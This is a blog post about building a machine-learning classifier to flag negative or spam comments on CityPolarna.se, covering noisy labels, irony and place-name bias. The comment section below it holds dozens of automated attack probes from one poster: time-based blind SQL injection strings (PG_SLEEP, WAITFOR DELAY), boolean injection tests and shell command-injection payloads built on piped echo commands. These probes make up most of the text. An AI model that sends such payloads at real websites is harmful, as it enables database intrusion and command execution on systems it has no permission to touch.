Lessons from building a spam filter

Can you use machine learning to spot angry customers before they leave or start a fire you cannot control? Johan spent some time this summer trying to figure that out and in this presentation, he share some of the obstacles he ran into in the process.​

We all want happy customers, but sometimes they have a bad day and that might affect you in more than you think. You might loose them as a customer bet even worse, they might write about you in social media and tell all their friends about the way you treated them. In this presentation Johan show some of the issues that came up while he was trying to solve this problem.​

To start you need to define what you want to do. In this case it was to find negative language and spam in comments on the website CityPolarna.​se. Then you must find the data and structure it in a way that make it easy to process by an algorithm. In this case that task was quite easy because all the data could be found in two tables in the database. But there were some issues with strange characters, bad spelling and missing spacing between words. The next step was to analyse the data to see if you can identify what you are looking for manually in the data. In this case that was done in cycles between running the algorithm and the looking at the data found. Many times, it turned out to be comments labelled incorrectly, that caused most of the issues but things like irony and just excessive use of numbers and exclamation marks also caused the algorithm to flag the comment as negative. When splitting the sentence up into smaller pieces we could better identify specific issues caused by bias. For instance, was Stockholm used more in negative comments and was therefor always turning the classification of a comment toward a negative score while Malmö was associated with more positive comments. Bias is one of the more dangerous parts of machine learning, because it can influence the decisions a model does in ways that are hard to predict. But it is not only the data that can make a model biased. Me as a developer also influence what I consider to be a negative comment and not when I manually adjust the labels of comments when analysing the result of the output from the model. What I classify as negative might not be considered as negative by other people. So, we need to be careful when we put more and more trust in these systems.​

When the model does what it is supposed to we can start to integrate it to our solution, there it is a good idea to incorporate some feedback mechanism that can produce more labelled data to train the model on in the future. In this case, when reporting a negative comment it would be a good idea to add a simple button that could verify or correct the classification of the comment so that we can use it as a label in the future.​

- Johan Broddfelt
Classification, spam filter, RNN

<< Action in mind FoodTech and AgroTech in Skåne >>

Comment

Name
Mail (Not public)
Send mail uppdates on new comments

Comments

97 posts found

kE58Czn9')) OR 438=​(SELECT 438 FROM PG_SLEEP(20))--

2026-06-08 20:26:06 - wUmrLVWz

ZYcOlhTx') OR 322=​(SELECT 322 FROM PG_SLEEP(20))--

2026-06-08 20:26:02 - wUmrLVWz

oU1YRf5B' OR 421=​(SELECT 421 FROM PG_SLEEP(20))--

2026-06-08 20:25:59 - wUmrLVWz

-1)) OR 487=​(SELECT 487 FROM PG_SLEEP(20))--

2026-06-08 20:25:57 - wUmrLVWz

-5) OR 825=​(SELECT 825 FROM PG_SLEEP(20))--

2026-06-08 20:25:55 - wUmrLVWz

-5 OR 497=​(SELECT 497 FROM PG_SLEEP(20))--

2026-06-08 20:25:50 - wUmrLVWz

UPpRRTTw'; waitfor delay '0:0:20' --

2026-06-08 20:25:46 - wUmrLVWz

1 waitfor delay '0:0:20' --

2026-06-08 20:25:44 - wUmrLVWz

-1); waitfor delay '0:0:20' --

2026-06-08 20:25:41 - wUmrLVWz

-1; waitfor delay '0:0:20' --

2026-06-08 20:25:38 - wUmrLVWz

-1" OR 3+532-532-1=​0+0+0+1 --

2026-06-08 20:25:16 - wUmrLVWz

-1" OR 2+532-532-1=​0+0+0+1 --

2026-06-08 20:25:12 - wUmrLVWz

-1' OR 3+657-657-1=​0+0+0+1 or 'BrIZDHhI'=​'

2026-06-08 20:25:07 - wUmrLVWz

-1' OR 2+657-657-1=​0+0+0+1 or 'BrIZDHhI'=​'

2026-06-08 20:25:01 - wUmrLVWz

-1' OR 3+258-258-1=​0+0+0+1 --

2026-06-08 20:24:57 - wUmrLVWz

-1' OR 2+258-258-1=​0+0+0+1 --

2026-06-08 20:24:53 - wUmrLVWz

-1 OR 3+231-231-1=​0+0+0+1

2026-06-08 20:24:51 - wUmrLVWz

-1 OR 2+231-231-1=​0+0+0+1

2026-06-08 20:24:47 - wUmrLVWz

|echo hvjyod$() ymssqanz^xyu||a #' |echo hvjyod$() ymssqanz^xyu||a #|" |echo hvjyod$() ymssqanz^xyu||a #

2026-06-08 20:24:46 - wUmrLVWz

&echo vwcpky$() lmimvmnz^xyu||a #' &echo vwcpky$() lmimvmnz^xyu||a #|" &echo vwcpky$() lmimvmnz^xyu||a #

2026-06-08 20:24:42 - wUmrLVWz

-1 OR 3+585-585-1=​0+0+0+1 --

2026-06-08 20:24:42 - wUmrLVWz

-1 OR 2+585-585-1=​0+0+0+1 --

2026-06-08 20:24:37 - wUmrLVWz

echo yupjtk$() lemoeynz^xyu||a #' &echo yupjtk$() lemoeynz^xyu||a #|" &echo yupjtk$() lemoeynz^xyu||a #

2026-06-08 20:24:37 - wUmrLVWz

|echo brwdhv$() bqsxemnz^xyu||a #' |echo brwdhv$() bqsxemnz^xyu||a #|" |echo brwdhv$() bqsxemnz^xyu||a #

2026-06-08 18:51:38 - wUmrLVWz

&echo fhlcum$() ypeudtnz^xyu||a #' &echo fhlcum$() ypeudtnz^xyu||a #|" &echo fhlcum$() ypeudtnz^xyu||a #

2026-06-08 18:51:34 - wUmrLVWz

echo tojves$() kujmwhnz^xyu||a #' &echo tojves$() kujmwhnz^xyu||a #|" &echo tojves$() kujmwhnz^xyu||a #

2026-06-08 18:51:30 - wUmrLVWz

DBMWSyvv')) OR 864=​(SELECT 864 FROM PG_SLEEP(12))--

2026-06-08 18:19:27 - wUmrLVWz

XSLg1gT0') OR 265=​(SELECT 265 FROM PG_SLEEP(12))--

2026-06-08 18:19:21 - wUmrLVWz

xhVBCfHC' OR 302=​(SELECT 302 FROM PG_SLEEP(12))--

2026-06-08 18:19:12 - wUmrLVWz

-1)) OR 608=​(SELECT 608 FROM PG_SLEEP(12))--

2026-06-08 18:19:01 - wUmrLVWz

-5) OR 263=​(SELECT 263 FROM PG_SLEEP(12))--

2026-06-08 18:18:52 - wUmrLVWz

-5 OR 574=​(SELECT 574 FROM PG_SLEEP(12))--

2026-06-08 18:18:45 - wUmrLVWz

OGWwI11j'; waitfor delay '0:0:12' --

2026-06-08 18:18:36 - wUmrLVWz

1 waitfor delay '0:0:12' --

2026-06-08 18:18:27 - wUmrLVWz

-1); waitfor delay '0:0:12' --

2026-06-08 18:18:19 - wUmrLVWz

-1; waitfor delay '0:0:12' --

2026-06-08 18:18:09 - wUmrLVWz

-1" OR 3+32-32-1=​0+0+0+1 --

2026-06-08 18:17:25 - wUmrLVWz

-1" OR 2+32-32-1=​0+0+0+1 --

2026-06-08 18:17:23 - wUmrLVWz

-1' OR 3+498-498-1=​0+0+0+1 or 'OunGBFNJ'=​'

2026-06-08 18:17:23 - wUmrLVWz

-1' OR 2+498-498-1=​0+0+0+1 or 'OunGBFNJ'=​'

2026-06-08 18:17:21 - wUmrLVWz

-1' OR 3+450-450-1=​0+0+0+1 --

2026-06-08 18:17:18 - wUmrLVWz

-1' OR 2+450-450-1=​0+0+0+1 --

2026-06-08 18:17:17 - wUmrLVWz

-1 OR 3+804-804-1=​0+0+0+1

2026-06-08 18:17:15 - wUmrLVWz

-1 OR 2+804-804-1=​0+0+0+1

2026-06-08 18:17:13 - wUmrLVWz

-1 OR 3+882-882-1=​0+0+0+1 --

2026-06-08 18:17:12 - wUmrLVWz

-1 OR 2+882-882-1=​0+0+0+1 --

2026-06-08 18:17:09 - wUmrLVWz

|echo rxdkab$() zgpufonz^xyu||a #' |echo rxdkab$() zgpufonz^xyu||a #|" |echo rxdkab$() zgpufonz^xyu||a #

2026-06-08 16:22:47 - wUmrLVWz

&echo rgkcxl$() sihlhmnz^xyu||a #' &echo rgkcxl$() sihlhmnz^xyu||a #|" &echo rgkcxl$() sihlhmnz^xyu||a #

2026-06-08 16:22:45 - wUmrLVWz

echo dyqahb$() vognynnz^xyu||a #' &echo dyqahb$() vognynnz^xyu||a #|" &echo dyqahb$() vognynnz^xyu||a #

2026-06-08 16:22:43 - wUmrLVWz

7wQjR6Ni')) OR 986=​(SELECT 986 FROM PG_SLEEP(12))--

2026-06-08 16:20:02 - wUmrLVWz

94UFOUQy') OR 885=​(SELECT 885 FROM PG_SLEEP(12))--

2026-06-08 16:20:00 - wUmrLVWz

rwVTH6Bp' OR 315=​(SELECT 315 FROM PG_SLEEP(12))--

2026-06-08 16:19:59 - wUmrLVWz

-1)) OR 947=​(SELECT 947 FROM PG_SLEEP(12))--

2026-06-08 16:19:56 - wUmrLVWz

-5) OR 915=​(SELECT 915 FROM PG_SLEEP(12))--

2026-06-08 16:19:54 - wUmrLVWz

-5 OR 132=​(SELECT 132 FROM PG_SLEEP(12))--

2026-06-08 16:19:52 - wUmrLVWz

UzH5riDn'; waitfor delay '0:0:12' --

2026-06-08 16:19:50 - wUmrLVWz

1 waitfor delay '0:0:12' --

2026-06-08 16:19:47 - wUmrLVWz

-1); waitfor delay '0:0:12' --

2026-06-08 16:19:45 - wUmrLVWz

-1; waitfor delay '0:0:12' --

2026-06-08 16:19:42 - wUmrLVWz

-1" OR 3*2>(0+5+608-608) --

2026-06-08 16:19:19 - wUmrLVWz

-1" OR 3*2<(0+5+608-608) --

2026-06-08 16:19:16 - wUmrLVWz

-1" OR 3+608-608-1=​0+0+0+1 --

2026-06-08 16:19:14 - wUmrLVWz

-1" OR 2+608-608-1=​0+0+0+1 --

2026-06-08 16:19:11 - wUmrLVWz

-1' OR 3*2>(0+5+942-942) or 'hCFKNlkE'=​'

2026-06-08 16:19:09 - wUmrLVWz

-1' OR 3*2<(0+5+942-942) or 'hCFKNlkE'='

2026-06-08 16:19:07 - wUmrLVWz

-1' OR 3+942-942-1=​0+0+0+1 or 'hCFKNlkE'=​'

2026-06-08 16:19:04 - wUmrLVWz

-1' OR 2+942-942-1=​0+0+0+1 or 'hCFKNlkE'=​'

2026-06-08 16:19:01 - wUmrLVWz

-1' OR 3*2>(0+5+998-998) --

2026-06-08 16:19:00 - wUmrLVWz

-1' OR 3*2<(0+5+998-998) --

2026-06-08 16:18:54 - wUmrLVWz

-1' OR 3+998-998-1=​0+0+0+1 --

2026-06-08 16:18:51 - wUmrLVWz

-1' OR 2+998-998-1=​0+0+0+1 --

2026-06-08 16:18:49 - wUmrLVWz

-1 OR 3*2>(0+5+643-643)

2026-06-08 16:18:47 - wUmrLVWz

-1 OR 3*2<(0+5+643-643)

2026-06-08 16:18:45 - wUmrLVWz

-1 OR 3+643-643-1=​0+0+0+1

2026-06-08 16:18:43 - wUmrLVWz

-1 OR 2+643-643-1=​0+0+0+1

2026-06-08 16:18:40 - wUmrLVWz

-1 OR 3*2>(0+5+221-221) --

2026-06-08 16:18:37 - wUmrLVWz

-1 OR 3*2<(0+5+221-221) --

2026-06-08 16:18:34 - wUmrLVWz

-1 OR 3+221-221-1=​0+0+0+1 --

2026-06-08 16:18:31 - wUmrLVWz

-1 OR 2+221-221-1=​0+0+0+1 --

2026-06-08 16:18:30 - wUmrLVWz